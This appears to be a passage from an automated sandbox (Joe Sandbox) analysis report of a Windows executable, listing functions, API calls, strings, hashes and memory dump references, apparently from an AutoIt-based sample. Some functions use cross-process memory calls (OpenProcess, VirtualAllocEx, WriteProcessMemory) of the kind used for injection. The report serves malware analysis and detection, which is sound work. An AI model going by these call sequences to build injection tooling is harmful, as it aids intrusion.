Part of subcall function 00140242: EnterCriticalSection.KERNEL32(001F070C,001F1884,?,?,0013198B,001F2518,?,?,?,001212F9,00000000), ref: 0014024D
Part of subcall function 00140242: LeaveCriticalSection.KERNEL32(001F070C,?,0013198B,001F2518,?,?,?,001212F9,00000000), ref: 0014028A

Part of subcall function 00129CB3: _wcslen.LIBCMT ref: 00129CBD

Part of subcall function 001400A3: __onexit.LIBCMT ref: 001400A9

__Init_thread_footer.LIBCMT ref: 001A7BFB

Part of subcall function 001401F8: EnterCriticalSection.KERNEL32(001F070C,?,?,00138747,001F2514), ref: 00140202
Part of subcall function 001401F8: LeaveCriticalSection.KERNEL32(001F070C,?,00138747,001F2514), ref: 00140235

Strings

G, xrefs: 001A7C7F
5, xrefs: 001A7C78
Variable must be of type 'Object'., xrefs: 001A7C3A

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit_wcslen
String ID: 5$G$Variable must be of type 'Object'.
API String ID: 535116098-3733170431
Opcode ID: e5e0c65ee2ea575c5151bd30d1f649fcf865677f1083257e5ad71474cb63c04a
Instruction ID: 7ab6a667efa6b90c6dfbafd56df174c3ab129f6567a25c13232fba576ac9deb3
Opcode Fuzzy Hash: e5e0c65ee2ea575c5151bd30d1f649fcf865677f1083257e5ad71474cb63c04a
Instruction Fuzzy Hash: 00918C78A04209EFCB04EF94D9919BDB7B2FF5A300F148059F906AB292DB71AF45CB51

Uniqueness

Uniqueness Score: -1.00%

Function 00182716 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0018B403: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,001821D0,?,?,00000034,00000800,?,00000034), ref: 0018B42D

SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00182760

Part of subcall function 0018B3CE: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,001821FF,?,?,00000800,?,00001073,00000000,?,?), ref: 0018B3F8

Part of subcall function 0018B32A: GetWindowThreadProcessId.USER32(?,?), ref: 0018B355
Part of subcall function 0018B32A: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00182194,00000034,?,?,00001004,00000000,00000000), ref: 0018B365
Part of subcall function 0018B32A: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00182194,00000034,?,?,00001004,00000000,00000000), ref: 0018B37B

SendMessageW.USER32(?,00001111,00000000,00000000), ref: 001827CD
SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0018281A

Strings

@, xrefs: 00182832

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
String ID: @
API String ID: 4150878124-2766056989
Opcode ID: d69b974c559ca7928730490602837ab5555bef9b7936bdebac0b1db4b2157b07
Instruction ID: 8273968a3afbdfb7f323bbb8d5f19709e57391ffb5f798d2cb24dc8c1bbdb240
Opcode Fuzzy Hash: d69b974c559ca7928730490602837ab5555bef9b7936bdebac0b1db4b2157b07
Instruction Fuzzy Hash: 9C410A72900218BFDB11EBA4C986AEEBBB8AB19700F104055FA55B7181DB706F85CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0015172E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 115COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\PsBygexGwH.exe,00000104), ref: 00151769
_free.LIBCMT ref: 00151834
_free.LIBCMT ref: 0015183E

Strings

C:\Users\user\Desktop\PsBygexGwH.exe, xrefs: 00151760, 00151767, 00151796, 001517CE

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: _free$FileModuleName
String ID: C:\Users\user\Desktop\PsBygexGwH.exe
API String ID: 2506810119-355721862
Opcode ID: 519159500f8efcf63cc5a0398d606f43d44bfb92951c0c64e9673cd8da106eb3
Instruction ID: 891ba15806a1ec34f013a39d1f96e3f111e2d04c6d7d8f1a1250da5fdb513272
Opcode Fuzzy Hash: 519159500f8efcf63cc5a0398d606f43d44bfb92951c0c64e9673cd8da106eb3
Instruction Fuzzy Hash: F6318375A40218FFDB22DB99D881E9EBBFCEB99311B144166FC249B211D7708E45CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0018C27D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 114windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 0018C306
DeleteMenu.USER32(?,00000007,00000000), ref: 0018C34C
DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,001F1990,01787028), ref: 0018C395

Strings

0, xrefs: 0018C2DF

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: Menu$Delete$InfoItem
String ID: 0
API String ID: 135850232-4108050209
Opcode ID: 63bde8d701d15b4f40e9e001d1623c06a7a3c626af005e5bc2c4a900eac0c972
Instruction ID: b03f1b683bba67c4db8c7d05bfcc91cc79c37a73b662d0f5ec5792c4f751ddb7
Opcode Fuzzy Hash: 63bde8d701d15b4f40e9e001d1623c06a7a3c626af005e5bc2c4a900eac0c972
Instruction Fuzzy Hash: BF418D312043019FD724EF29D884B5ABBE4BB95320F148A2DFDA597291D730AA05CFA2

Uniqueness

Uniqueness Score: -1.00%

Function 001B4416 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 106COMMON

Download Yara Rule

APIs

SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,001BCC08,00000000,?,?,?,?), ref: 001B44AA
GetWindowLongW.USER32 ref: 001B44C7
SetWindowLongW.USER32(?,000000F0,00000000), ref: 001B44D7

Strings

SysTreeView32, xrefs: 001B447C

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: Window$Long
String ID: SysTreeView32
API String ID: 847901565-1698111956
Opcode ID: 2e55f2361d9cd0c06602eb96c4b362c4c73fcd01f9204e6584c3184ba97fe127
Instruction ID: 81be10abdefca39a9e035677a937735d9cf6dd33ef8939a35b49f91808b70a27
Opcode Fuzzy Hash: 2e55f2361d9cd0c06602eb96c4b362c4c73fcd01f9204e6584c3184ba97fe127
Instruction Fuzzy Hash: 5C319E31210605AFDF208E38DC45FEA7BA9EB08334F208715F975922D1D770EC6097A0

Uniqueness

Uniqueness Score: -1.00%

Function 001A304E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90networkCOMMON

Download Yara Rule

APIs

Part of subcall function 001A335B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,001A3077,?,?), ref: 001A3378

inet_addr.WSOCK32(?), ref: 001A307A
_wcslen.LIBCMT ref: 001A309B
htons.WSOCK32(00000000), ref: 001A3106

Strings

255.255.255.255, xrefs: 001A3095, 001A309A

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: ByteCharMultiWide_wcslenhtonsinet_addr
String ID: 255.255.255.255
API String ID: 946324512-2422070025
Opcode ID: 087db102d8daaa291f450324a59f206d8836e81f4fd615ed652716d9e40539fe
Instruction ID: 0b2f6e879021a78f44ebae791f0f183b8fb96dd47c56d81ce6cd5e8807c176c6
Opcode Fuzzy Hash: 087db102d8daaa291f450324a59f206d8836e81f4fd615ed652716d9e40539fe
Instruction Fuzzy Hash: 2031CF792042059FCB20CF68C586FAA77E0EF56318F258059F8258B3A2DB32EE45C760

Uniqueness

Uniqueness Score: -1.00%

Function 001B4653 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 87windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000469,?,00000000), ref: 001B4705
SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 001B4713
DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 001B471A

Strings

msctls_updown32, xrefs: 001B4684

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: MessageSend$DestroyWindow
String ID: msctls_updown32
API String ID: 4014797782-2298589950
Opcode ID: eadc295989b45e27a71c13a218757389770c46750e938879eb1bb3606449801e
Instruction ID: 42e60b7ad50d3f46c5f22df070d1f7877a1e8a4d8024ab351be1b143ed257a1f
Opcode Fuzzy Hash: eadc295989b45e27a71c13a218757389770c46750e938879eb1bb3606449801e
Instruction Fuzzy Hash: A0213EB5600209AFDB11DF64DC81DF737ADEB5A398B044159FA009B291CB71EC51CAA0

Uniqueness

Uniqueness Score: -1.00%

Function 001895AD Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 85COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0018961D

Strings

#OnAutoItStartRegister, xrefs: 001895F3
#requireadmin, xrefs: 001895D9
#notrayicon, xrefs: 001895B7

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: _wcslen
String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
API String ID: 176396367-2734436370
Opcode ID: 6834c9850580b54eacd6979db061cee7a249187a4e5cfe3c04e6a42d3d854bec
Instruction ID: 2e2d7b17e0efe95e07d6575f09d5b15f7eef7a75d87e25af11adbaa808852c85
Opcode Fuzzy Hash: 6834c9850580b54eacd6979db061cee7a249187a4e5cfe3c04e6a42d3d854bec
Instruction Fuzzy Hash: 71213A72204621A6D335BB24DC02FBB73D89FA5310F28443AF94997181FB51AF52C7D5

Uniqueness

Uniqueness Score: -1.00%

Function 001B37B7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000180,00000000,?), ref: 001B3840
SendMessageW.USER32(?,00000186,00000000,00000000), ref: 001B3850
MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 001B3876

Strings

Listbox, xrefs: 001B380F

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: MessageSend$MoveWindow
String ID: Listbox
API String ID: 3315199576-2633736733
Opcode ID: 27d49b9218f5455642c83cf082d117c38f6c34dc74e5c69482f307bb40a6cdc2
Instruction ID: f52e7526673cde8bfb6305b32e389c183a6ed53ed628b279373fad6c3527fe94
Opcode Fuzzy Hash: 27d49b9218f5455642c83cf082d117c38f6c34dc74e5c69482f307bb40a6cdc2
Instruction Fuzzy Hash: DC218E72610218BBEB219F55DC85EFB376EEF99750F118224F9149B190CB71DC6287E0

Uniqueness

Uniqueness Score: -1.00%

Function 001949F4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00194A08
GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00194A5C
SetErrorMode.KERNEL32(00000000,?,?,001BCC08), ref: 00194AD0

Strings

%lu, xrefs: 00194A6F

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: ErrorMode$InformationVolume
String ID: %lu
API String ID: 2507767853-685833217
Opcode ID: 47a7ca1d58563b3cbfbd751f50170b0110aa658f5b65a189a7dc92aafa78650e
Instruction ID: 259304a7b53961331be271c0824e71690ae58a03018a0fa7bfdb40ae53e3c6a3
Opcode Fuzzy Hash: 47a7ca1d58563b3cbfbd751f50170b0110aa658f5b65a189a7dc92aafa78650e
Instruction Fuzzy Hash: CF317375A00108AFDB10DF58C885EAA7BF8EF08308F1440A5F505EB252D771ED46CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 001B41EB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 001B424F
SendMessageW.USER32(?,00000406,00000000,00640000), ref: 001B4264
SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 001B4271

Strings

msctls_trackbar32, xrefs: 001B4226

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: MessageSend
String ID: msctls_trackbar32
API String ID: 3850602802-1010561917
Opcode ID: aec7618e7d7faadac5396374586c9554b9e4b403188290916aa808ebedd20915
Instruction ID: 503dd1ad3dc50f7f57541286e0bedd57f18534b612edcbf79b1bc8165182bede
Opcode Fuzzy Hash: aec7618e7d7faadac5396374586c9554b9e4b403188290916aa808ebedd20915
Instruction Fuzzy Hash: 5B11E371240248BFEF209E29DC06FEB3BACEF95B54F014114FA55E2091D371DC519B50

Uniqueness

Uniqueness Score: -1.00%

Function 00182F52 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00126B57: _wcslen.LIBCMT ref: 00126B6A

Part of subcall function 00182DA7: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00182DC5
Part of subcall function 00182DA7: GetWindowThreadProcessId.USER32(?,00000000), ref: 00182DD6
Part of subcall function 00182DA7: GetCurrentThreadId.KERNEL32 ref: 00182DDD
Part of subcall function 00182DA7: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00182DE4

GetFocus.USER32 ref: 00182F78

Part of subcall function 00182DEE: GetParent.USER32(00000000), ref: 00182DF9

GetClassNameW.USER32(?,?,00000100), ref: 00182FC3
EnumChildWindows.USER32(?,0018303B), ref: 00182FEB

Strings

%s%d, xrefs: 00182FFF

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
String ID: %s%d
API String ID: 1272988791-1110647743
Opcode ID: 78fb15367d1490a51323d0945124cfaebdfd12c9e2465d30195ba6de6357f4d0
Instruction ID: 6b53144a0b691a4d82af2042a2308a624202011a79154e6e41f280ea620660ec
Opcode Fuzzy Hash: 78fb15367d1490a51323d0945124cfaebdfd12c9e2465d30195ba6de6357f4d0
Instruction Fuzzy Hash: 2911B1B57002056BCF157FB09C85EEE3B6AAFA4704F044075F9199B292DF309A498F70

Uniqueness

Uniqueness Score: -1.00%

Function 001B5882 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 001B58C1
SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 001B58EE
DrawMenuBar.USER32(?), ref: 001B58FD

Strings

0, xrefs: 001B588F

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: Menu$InfoItem$Draw
String ID: 0
API String ID: 3227129158-4108050209
Opcode ID: 90d418b3f0626459f060ff95bc917b6e9c592e3c8981bcbdaf6bf5e3664dd698
Instruction ID: b3444826f4998f024412687c4b3aac3feb30ad0ac38e80a3ce89781643c0a4ae
Opcode Fuzzy Hash: 90d418b3f0626459f060ff95bc917b6e9c592e3c8981bcbdaf6bf5e3664dd698
Instruction Fuzzy Hash: 7C012D31600218EFDB219F11DC44BEEBBB5FB45365F1480AAE849D6151DB308A95DF61

Uniqueness

Uniqueness Score: -1.00%

Function 0018007F Relevance: 6.3, APIs: 4, Instructions: 322COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 166a6a01a95d410f1a78f0567e249b00028ffa34734a18ef45081f6462325a21
Instruction ID: 201e8da7aa6dc1cc3974b2270d43354bc64d9601192ddb70f1c58cb481233aba
Opcode Fuzzy Hash: 166a6a01a95d410f1a78f0567e249b00028ffa34734a18ef45081f6462325a21
Instruction Fuzzy Hash: 5DC18C75A0020AEFDB55DFA4C898AAEB7B5FF48304F118198E805EB251C770EE85CF90

Uniqueness

Uniqueness Score: -1.00%

Function 00153E80 Relevance: 6.3, APIs: 4, Instructions: 305COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 00153F0B
__alldvrm.LIBCMT ref: 0015410C
__alldvrm.LIBCMT ref: 0015412E

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: __alldvrm$_strrchr
String ID:
API String ID: 1036877536-0
Opcode ID: 190bec492484a18a97fe5f025dcdb3e473ceac46589bc02d4dbe4f94f5be8f6e
Instruction ID: 376ef9535a776f6424d314adf889a37878be4b85093c0fe3b224d912fcd0ebc3
Opcode Fuzzy Hash: 190bec492484a18a97fe5f025dcdb3e473ceac46589bc02d4dbe4f94f5be8f6e
Instruction Fuzzy Hash: 9AA17872D00786DFEB15CF18C8917AEBBE4EF21395F28416EE9A59F281C3349989C750

Uniqueness

Uniqueness Score: -1.00%

Function 001A342E Relevance: 6.3, APIs: 4, Instructions: 257COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 001A3459
CoUninitialize.OLE32 ref: 001A3463
VariantInit.OLEAUT32(?), ref: 001A346E
VariantClear.OLEAUT32(?), ref: 001A371B

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: Variant$ClearInitInitializeUninitialize
String ID:
API String ID: 1998397398-0
Opcode ID: 744f804a2d0fd84658096666893def88177e92397cec101059a34815fbf72a05
Instruction ID: 25569b8264cbcf34f0cb5fa14cf7c321dc54531c1da37f0161ae79dbde9d7ae9
Opcode Fuzzy Hash: 744f804a2d0fd84658096666893def88177e92397cec101059a34815fbf72a05
Instruction Fuzzy Hash: C2A14A796043109FC704DF28D585A2AB7E5FF99714F048859F99AAB3A2DB30EE01CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00180436 Relevance: 6.2, APIs: 4, Instructions: 230COMMON

Download Yara Rule

APIs

ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,001BFC08,?), ref: 001805F0
CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,001BFC08,?), ref: 00180608
CLSIDFromProgID.OLE32(?,?,00000000,001BCC40,000000FF,?,00000000,00000800,00000000,?,001BFC08,?), ref: 0018062D
_memcmp.LIBVCRUNTIME ref: 0018064E

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

